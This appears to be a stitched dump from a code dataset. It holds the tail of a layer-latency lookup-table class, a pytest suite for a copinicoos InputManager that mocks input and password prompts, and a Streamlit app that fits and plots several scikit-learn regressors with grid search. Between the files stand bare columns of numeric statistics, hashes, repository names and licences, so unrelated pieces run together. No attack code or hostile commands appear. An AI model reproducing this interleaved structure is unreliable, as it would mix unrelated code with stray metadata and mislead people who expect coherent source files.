if write_to_file is not None:
self._write_lookup_table_to_file(write_to_file)
def _calculate_latency(self, operations, layers_parameters, layers_input_shapes, cnt_of_runs):
LATENCY_BATCH_SIZE = 1
latency_table_layer_by_ops = [{} for i in range(self.cnt_layers)]
for layer_id in range(self.cnt_layers):
for op_name in operations:
op = operations[op_name](*layers_parameters[layer_id])
input_sample = torch.randn((LATENCY_BATCH_SIZE, *layers_input_shapes[layer_id]))
globals()['op'], globals()['input_sample'] = op, input_sample
total_time = timeit.timeit('output = op(input_sample)', setup="gc.enable()", \
globals=globals(), number=cnt_of_runs)
# measured in micro-second
latency_table_layer_by_ops[layer_id][op_name] = total_time / cnt_of_runs / LATENCY_BATCH_SIZE * 1e6
return latency_table_layer_by_ops
def _write_lookup_table_to_file(self, path_to_file):
clear_files_in_the_list([path_to_file])
ops = [op_name for op_name in self.lookup_table_operations]
text = [op_name + " " for op_name in ops[:-1]]
text.append(ops[-1] + "\n")
for layer_id in range(self.cnt_layers):
for op_name in ops:
text.append(str(self.lookup_table_latency[layer_id][op_name]))
text.append(" ")
text[-1] = "\n"
text = text[:-1]
text = ''.join(text)
add_text_to_file(text, path_to_file)
def _create_from_file(self, path_to_file):
self.lookup_table_latency = self._read_lookup_table_from_file(path_to_file)
def _read_lookup_table_from_file(self, path_to_file):
latences = [line.strip('\n') for line in open(path_to_file)]
ops_names = latences[0].split(" ")
latences = [list(map(float, layer.split(" "))) for layer in latences[1:]]
latency = []
for layer in range(self.cnt_layers):
latency.append([])
for op in range(3):
latency[layer].append([])
for op in range(3):
for layer in range(self.cnt_layers):
latency[layer][op] = 0
for bit in range(8):
latency[layer][op] += math.ceil(len(self.index[op][layer][bit])/8)*8 * latences[bit][op]
lookup_table_latency = [{op_name : latency[i][op_id]
for op_id, op_name in enumerate(ops_names)
} for i in range(self.cnt_layers)]
return lookup_table_latency
| 50.893733
| 121
| 0.530571
| 2,155
| 18,678
| 4.27471
| 0.114617
| 0.101498
| 0.063504
| 0.087929
| 0.813287
| 0.803734
| 0.780395
| 0.759444
| 0.743812
| 0.743812
| 0
| 0.020911
| 0.365028
| 18,678
| 366
| 122
| 51.032787
| 0.755818
| 0.084966
| 0
| 0.766892
| 0
| 0
| 0.067732
| 0.008347
| 0
| 0
| 0
| 0
| 0
| 1
| 0.050676
| false
| 0
| 0.037162
| 0
| 0.118243
| 0.003378
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
aa68d1248496dc1025a7ba16e2ad201dc91ec0e5
| 7,563
|
py
|
Python
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 2
|
2019-09-11T03:08:10.000Z
|
2019-09-13T08:02:45.000Z
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 35
|
2019-08-04T03:37:12.000Z
|
2019-09-17T03:30:18.000Z
|
tests/test_input_manager.py
|
gitter-badger/copinicoos
|
6a758c3b1718c904ae066d5617291807798b7ab1
|
[
"MIT"
] | 2
|
2019-09-07T04:16:59.000Z
|
2020-09-23T10:51:37.000Z
|
import json
import os
import time
import pytest
from copinicoos import InputManager
from copinicoos import input_manager
from conftest import query_txt_path, secrets1_json_path, secrets2_json_path, test_dir, close_all_loggers
@pytest.mark.parametrize(
"query, login", [
("@" + query_txt_path, "@" + secrets1_json_path),
("@" + query_txt_path, secrets1_json_path),
("@" + query_txt_path, secrets2_json_path),
]
)
def test_cmd_input_fresh(query, login):
im = InputManager()
im.cmd_input(test_args=['fresh', query, login])
args = im.return_args()
assert type(args).__name__ == "Args"
def test_cmd_input_resume(worker_manager):
worker_manager.setup_workdir()
im = InputManager()
im.cmd_input(test_args=['resume', '-d', test_dir])
args = im.return_args()
assert type(args).__name__ == "Args"
def test_cmd_input_options(worker_manager):
worker_manager.setup_workdir()
im = InputManager()
with pytest.raises(SystemExit):
im.cmd_input(test_args=['resume', '-d', test_dir, '-r', '20.7', '-p', '40.8'])
args = im.return_args()
assert type(args).__name__ != "Args"
def test_get_total_results_from_query_success(query, input_manager_with_2_workers):
im = input_manager_with_2_workers
tr = im.get_total_results_from_query(query)
print(str(tr))
assert type(im.args.total_results) is int
assert type(tr) is int
assert tr == im.args.total_results
assert tr > 0
@pytest.mark.parametrize(
"arg", [
(secrets1_json_path),
('{"u1": "username", "p1": "password"}'),
('{"u1":"username" ,\n "p1":"password"}'),
('{\n"u1" : " username" ,\n "p1":"password"\n}'),
(open(secrets2_json_path).read())
]
)
def test_get_json_creds_success(arg):
im = InputManager()
out = im.get_json_creds(arg)
assert type(out) == dict
@pytest.mark.parametrize(
"arg", [
("badfile.json")
]
)
def test_get_json_creds_badfile(arg):
im = InputManager()
with pytest.raises(Exception) as e:
im.get_json_creds(arg)
assert "No such file or directory" in str(e.value)
def test_interactive_input(capsys, creds, query):
input_values = [
test_dir,
2,
creds["u1"],
creds["u2"],
query,
"\n",
"\n"
]
im = InputManager()
def mock_input():
return input_values.pop(0)
input_manager.input = mock_input
passwords = [
creds["p1"],
creds["p2"]
]
def mock_getpass():
return passwords.pop(0)
input_manager.getpass.getpass = mock_getpass
im.interactive_input()
out, err = capsys.readouterr()
assert "Default download directory set to" in out
assert "Enter new path" in out
assert "Enter number of accounts:" in out
assert "Enter username of account" in out
assert "Enter password of account" in out
assert "Authenticating worker..." in out
assert "Worker sucessfully authenticated." in out
assert "Enter query:" in out
assert "products found" in out
assert "Default polling interval" in out
assert "Enter new polling interval" in out
assert "Default offline retries" in out
assert "Enter new offline retries" in out
print(out)
args = im.return_args()
assert type(args).__name__ == "Args"
assert len(im.return_worker_list()) == 4
def test_interactive_input_resume_yes(worker_manager, capsys):
worker_manager.setup_workdir()
close_all_loggers()
input_values = [
test_dir,
"y",
"\n",
"\n"
]
im = InputManager()
def mock_input():
return input_values.pop(0)
input_manager.input = mock_input
im.interactive_input()
out, err = capsys.readouterr()
print(out)
assert "Default download directory set to" in out
assert "Enter new path" in out
assert "Save point found. Resume previous download? (y/n)" in out
assert "Enter number of accounts:" not in out
assert "Enter username of account" not in out
assert "Enter password of account" not in out
assert "Authenticating worker..." in out
assert "Worker sucessfully authenticated." in out
assert "Enter query:" not in out
assert "products found" in out
assert "Default polling interval" in out
assert "Enter new polling interval" in out
assert "Default offline retries" in out
assert "Enter new offline retries" in out
args = im.return_args()
assert type(args).__name__ == "Args"
assert len(im.return_worker_list()) == 2
def test_interactive_input_resume_bad_config(worker_manager, creds, query, capsys):
worker_manager.query = "bad query"
worker_manager.setup_workdir()
close_all_loggers()
input_values = [
test_dir,
"y",
2,
creds["u1"],
creds["u2"],
query,
"\n",
"\n"
]
im = InputManager()
def mock_input():
return input_values.pop(0)
input_manager.input = mock_input
passwords = [
creds["p1"],
creds["p2"]
]
def getpass():
return passwords.pop(0)
input_manager.getpass.getpass = getpass
im.interactive_input()
out, err = capsys.readouterr()
print(out)
assert "Default download directory set to" in out
assert "Enter new path" in out
assert "Save point found. Resume previous download? (y/n)" in out
assert "Enter number of accounts:" in out
assert "Enter username of account" in out
assert "Enter password of account" in out
assert "Authenticating worker..." in out
assert "Worker sucessfully authenticated." in out
assert "Enter query:" in out
assert "products found" in out
assert "Default polling interval" in out
assert "Enter new polling interval" in out
assert "Default offline retries" in out
assert "Enter new offline retries" in out
args = im.return_args()
assert type(args).__name__ == "Args"
assert len(im.return_worker_list()) == 4
def test_interactive_input_resume_invalid_input_and_no(worker_manager, creds, query, capsys):
worker_manager.setup_workdir()
close_all_loggers()
input_values = [
test_dir,
"nope",
"n",
2,
creds["u1"],
creds["u2"],
query,
"\n",
"\n"
]
im = InputManager()
def mock_input():
return input_values.pop(0)
input_manager.input = mock_input
passwords = [
creds["p1"],
creds["p2"]
]
def getpass():
return passwords.pop(0)
input_manager.getpass.getpass = getpass
im.interactive_input()
out, err = capsys.readouterr()
print(out)
assert "Default download directory set to" in out
assert "Enter new path" in out
assert "Save point found. Resume previous download? (y/n)" in out
assert "Failed to load config from config.json" not in out
assert "Enter number of accounts:" in out
assert "Enter username of account" in out
assert "Enter password of account" in out
assert "Authenticating worker..." in out
assert "Worker sucessfully authenticated." in out
assert "Enter query:" in out
assert "products found" in out
assert "Default polling interval" in out
assert "Enter new polling interval" in out
assert "Default offline retries" in out
assert "Enter new offline retries" in out
args = im.return_args()
assert type(args).__name__ == "Args"
assert len(im.return_worker_list()) == 4
| 29.542969
| 104
| 0.648023
| 991
| 7,563
| 4.752775
| 0.129162
| 0.059448
| 0.121444
| 0.095117
| 0.83482
| 0.789172
| 0.762845
| 0.728238
| 0.696178
| 0.657113
| 0
| 0.008406
| 0.245009
| 7,563
| 255
| 105
| 29.658824
| 0.816462
| 0
| 0
| 0.700441
| 0
| 0
| 0.223883
| 0
| 0
| 0
| 0
| 0
| 0.321586
| 1
| 0.07489
| false
| 0.0837
| 0.030837
| 0.030837
| 0.136564
| 0.022026
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 7
|
6304c7cdac16df7c1c2994911760b9601580f790
| 54,938
|
py
|
Python
|
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
Regressor.py
|
kaushikroychowdhury/Auto-ML-Tool
|
d8b71a3caa5641fe39d024183c1442c8b775b26a
|
[
"MIT"
] | null | null | null |
import streamlit as st
import pandas as pd
import numpy as np
import base64
import re
import plotly.graph_objects as go
import plotly.express as px
# import seaborn as sns
# import matplotlib.pyplot as plt
from sklearn.model_selection import train_test_split
from sklearn.metrics import mean_squared_error, r2_score, mean_absolute_error
from sklearn.model_selection import GridSearchCV
from sklearn.datasets import load_diabetes
# Functions ............................................................................................................
collect_numbers = lambda x: [float(i) for i in re.split(',+', x) if i != ""]
collect_numbers_int = lambda x: [int(i) for i in re.split(',+', x) if i != ""]
def filedownload(df):
"""
filedownload function converts the dataframe df into csv file and downloads it.
:param df: dataframe containing max_feature, n_estimators, R^2.
"""
csv = df.to_csv(index=False)
b64 = base64.b64encode(csv.encode()).decode() # strings <-> bytes conversions
href = f'<a href="data:file/csv;base64,{b64}" download="model_performance.csv">Download CSV File</a>'
return href
def build_model_Adaboost_Regressor(df):
"""
It builds a model using Adaboost regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.ensemble import AdaBoostRegressor
all=False
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
adaboost = AdaBoostRegressor(loss= loss, random_state= random_state)
grid = GridSearchCV(estimator=adaboost, param_grid=param_grid, cv=5, n_jobs=n_jobs)
grid.fit(X_train, Y_train)
st.subheader('Model Performance')
Y_pred_test = grid.predict(X_test)
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" %r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" %mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
all = True
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" %mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" %rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" %mae)
st.write("The best parameters are %s with a score of %0.2f"
% (grid.best_params_, grid.best_score_))
st.subheader('Model Parameters')
st.write(grid.get_params())
# Grid Data .......
grid_results = pd.concat(
[pd.DataFrame(grid.cv_results_["params"]), pd.DataFrame(grid.cv_results_["mean_test_score"], columns=["R2"])],
axis=1)
# Segment data into groups based on the 2 hyperparameters
grid_contour = grid_results.groupby(['learning_rate', 'n_estimators']).mean()
# Pivoting the data
grid_reset = grid_contour.reset_index()
grid_reset.columns = ['learning_rate', 'n_estimators', 'R2']
grid_pivot = grid_reset.pivot('learning_rate', 'n_estimators')
x = grid_pivot.columns.levels[1].values
y = grid_pivot.index.values
z = grid_pivot.values
# -----Plot-----#
layout = go.Layout(
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='n_estimators')
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='Learning_rate')
))
fig = go.Figure(data=[go.Surface(z=z, y=y, x=x)], layout=layout)
fig.update_layout(title='Hyperparameter tuning',
scene=dict(
xaxis_title='n_estimators',
yaxis_title='Learning_Rate',
zaxis_title='R2'),
autosize=False,
width=800, height=800,
margin=dict(l=65, r=50, b=65, t=90))
st.plotly_chart(fig)
if all == True:
criteria = ['RMSE', 'MSE', 'MAE']
# colors = {'RMSE': 'red',
# 'MSE': 'orange',
# 'MAE': 'lightgreen'}
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
# -----Save grid data-----#
x = pd.DataFrame(x)
y = pd.DataFrame(y)
z = pd.DataFrame(z)
df = pd.concat([x, y, z], axis=1)
st.markdown(filedownload(grid_results), unsafe_allow_html=True)
##################################################### Linear regression to be worked on
def build_model_Linear_Regressor(df):
"""
It builds a model using Linear regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.linear_model import LinearRegression
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
model = LinearRegression()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
model.fit(dfx, Y_train)
Y_pred_test = model.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
model.fit(dfx, Y_train)
dfxtest = X_test[ind_var]
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max=X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max=X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = model.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = model.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=5))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
model.fit(dfx, Y_train)
dfxtest = X_test[ind_var]
Y_pred_test = model.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
for i in range(0,c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
model.fit(dfx, Y_train)
pred = model.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" %r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" %mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" %mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" %rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" %mae)
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# Change the bar mode
fig.update_layout(barmode='group')
##################################################Randomm Forest
def build_model_RandomForestRegressor(df):
"""
It builds a model using Adaboost regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.ensemble import RandomForestRegressor
all=False
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
# X_train.shape, Y_train.shape
# X_test.shape, Y_test.shape
rf = RandomForestRegressor(n_estimators=n_estimators,
random_state=random_state,
max_features=max_features,
min_samples_split=min_samples_split,
min_samples_leaf=min_samples_leaf,
bootstrap=bootstrap,
oob_score=oob_score,
n_jobs=n_jobs)
grid = GridSearchCV(estimator=rf, param_grid=param_grid, cv=5)
grid.fit(X_train, Y_train)
st.subheader('Model Performance')
Y_pred_test = grid.predict(X_test)
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" %r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" %mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
all = True
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" %mse)
st.write('Root Mean Squared Error (RMSE):')
rmse = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" %rmse)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" %mae)
st.write("The best parameters are %s with a score of %0.2f"
% (grid.best_params_, grid.best_score_))
st.subheader('Model Parameters')
st.write(grid.get_params())
# Grid Data .......
grid_results = pd.concat([pd.DataFrame(grid.cv_results_["params"]), pd.DataFrame(grid.cv_results_["mean_test_score"], columns=["R2"])], axis=1)
# Segment data into groups based on the 2 hyperparameters
grid_contour = grid_results.groupby(['max_features', 'n_estimators']).mean()
# Pivoting the data
grid_reset = grid_contour.reset_index()
grid_reset.columns = ['max_features', 'n_estimators', 'R2']
grid_pivot = grid_reset.pivot('max_features', 'n_estimators')
x = grid_pivot.columns.levels[1].values
y = grid_pivot.index.values
z = grid_pivot.values
# -----Plot-----#
layout = go.Layout(
xaxis=go.layout.XAxis(
title=go.layout.xaxis.Title(
text='n_estimators')
),
yaxis=go.layout.YAxis(
title=go.layout.yaxis.Title(
text='max_features')
))
fig = go.Figure(data=[go.Surface(z=z, y=y, x=x)], layout=layout)
fig.update_layout(title='Hyperparameter tuning (Surface Plot)',
scene=dict(
xaxis_title='n_estimators',
yaxis_title='max_features',
zaxis_title='R2'),
autosize=False,
width=800, height=800,
margin=dict(l=65, r=50, b=65, t=90))
st.plotly_chart(fig)
if all == True:
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rmse, mse, mae])])
st.plotly_chart(fig)
# -----Save grid data-----#
x = pd.DataFrame(x)
y = pd.DataFrame(y)
z = pd.DataFrame(z)
df = pd.concat([x, y, z], axis=1)
st.markdown(filedownload(grid_results), unsafe_allow_html=True)
################################################## SVR
def build_model_SVR(df):
"""
It builds a model using Support Vector regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.svm import SVR
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
model = SVR()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
clf = GridSearchCV(model, param_grid)
clf.fit(dfx,Y_train)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max = X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max = X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=3))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
clf1 = GridSearchCV(model, param_grid)
for i in range(0,c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
clf1.fit(dfx, Y_train)
pred = clf1.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.write("The best parameters are %s with a score of %0.2f"
% (clf.best_params_, clf.best_score_))
st.subheader('Model Parameters')
st.write(clf.get_params())
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" %r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" %mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" %mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" %mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" %rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" %mae)
criteria = ['RMSE', 'MSE', 'MAE']
fig = go.Figure([go.Bar(x=criteria, y=[rsme, mse, mae])])
st.plotly_chart(fig)
# st.subheader("Hyperparameter Tuning Results")
# df_gridsearch = pd.DataFrame(clf.cv_results_)
# dfViz = df_gridsearch[['param_C', 'param_gamma', 'mean_test_score']]
#
# pivot = pd.pivot_table(data=dfViz, index=['param_C'], columns=['param_gamma'], values=['mean_test_score'])
# sns.heatmap(pivot, annot=True)
# st.pyplot(plt)
# Change the bar mode
fig.update_layout(barmode='group')
################################################## SGD
def build_model_SGD(df):
"""
It builds a model using Stocastic gradient descent regresion Algorithm.
Takes input from streamlit web interface and use those inputs for building the model.
Used GridSearchCV for Hyperparameter Tunning.
Ploting the result using Plotly Framework.
:param df: dataframe containing features and labels.
"""
from sklearn.linear_model import SGDRegressor
X = df.iloc[:, :-1] # Using all column except for the last column as X
Y = df.iloc[:, -1] # Selecting the last column as Y
st.markdown('A model is being built to predict the following **Y** variable:')
st.info(Y.name)
# Data splitting
X_train, X_test, Y_train, Y_test = train_test_split(X, Y, test_size=split_size)
if scale == 'True':
from sklearn.preprocessing import StandardScaler
cols = X_train.columns
scaler = StandardScaler()
scaler.fit(X_train)
X_train = scaler.transform(X_train)
X_test = scaler.transform(X_test)
X_train = pd.DataFrame(X_train, columns=cols)
X_test = pd.DataFrame(X_test, columns=cols)
model = SGDRegressor()
if len(ind_var) == 1:
dfx = X_train[ind_var[0]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[0]].values.reshape(-1, 1)
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter(df, x=ind_var[0], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[0]], y=Y_pred_test, name='Regression Fit'))
st.plotly_chart(fig)
if len(ind_var) == 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
mesh_size = .02
margin = 0
# Create a mesh grid on which we will run our model
x_min, x_max=X_test[ind_var[0]].min() - margin, X_test[ind_var[0]].max() + margin
y_min, y_max=X_test[ind_var[1]].min() - margin, X_test[ind_var[1]].max() + margin
xrange = np.arange(x_min, x_max, mesh_size)
yrange = np.arange(y_min, y_max, mesh_size)
xx, yy = np.meshgrid(xrange, yrange)
# Run model
pred = clf.predict(np.c_[xx.ravel(), yy.ravel()])
pred = pred.reshape(xx.shape)
Y_pred_test = clf.predict(dfxtest)
fig = px.scatter_3d(df, x=ind_var[0], y=ind_var[1], z=Y_test.name)
fig.update_traces(marker=dict(size=3))
fig.add_traces(go.Surface(x=xrange, y=yrange, z=pred, name='pred_surface'))
st.plotly_chart(fig)
if len(ind_var) > 2:
dfx = X_train[ind_var]
dfxtest = X_test[ind_var]
clf = GridSearchCV(model, param_grid)
clf.fit(dfx, Y_train)
Y_pred_test = clf.predict(dfxtest)
st.subheader(f"Visualization shows how {Y_test.name} is dependent on individual variable")
c = len(ind_var)
clf1 = GridSearchCV(model, param_grid)
for i in range(0, c):
dfx = X_train[ind_var[i]].values.reshape(-1, 1)
dfxtest = X_test[ind_var[i]].values.reshape(-1, 1)
clf1.fit(dfx, Y_train)
pred = clf1.predict(dfxtest)
fig = px.scatter(df, x=ind_var[i], y=Y_test.name, opacity=0.65)
fig.add_traces(go.Scatter(x=X_test[ind_var[i]], y=pred, name='Regression Fit'))
st.plotly_chart(fig)
st.write("The best parameters are %s with a score of %0.2f"
% (clf.best_params_, clf.best_score_))
st.subheader('Model Parameters')
st.write(clf.get_params())
st.subheader('Model Performance')
st.write('Coefficient of determination ($R^2$):')
st.info("%0.3f" % r2_score(Y_test, Y_pred_test))
if criterion == 'MSE':
st.write('Mean Squared Error (MSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test))
if criterion == 'MAE':
st.write('Mean Absolute Error (MAE):')
st.info("%0.2f" % mean_absolute_error(Y_test, Y_pred_test))
if criterion == 'RMSE':
st.write('Root Mean Squared Error (RMSE):')
st.info("%0.2f" % mean_squared_error(Y_test, Y_pred_test, squared=False))
if criterion == 'All':
st.write('Mean Squared Error (MSE):')
mse = mean_squared_error(Y_test, Y_pred_test)
st.info("%0.2f" % mse)
st.write('Root Mean Squared Error (RMSE):')
rsme = mean_squared_error(Y_test, Y_pred_test, squared=False)
st.info("%0.2f" % rsme)
st.write('Mean Absolute Error (MAE):')
mae = mean_absolute_error(Y_test, Y_pred_test)
st.info("%0.2f" % mae)
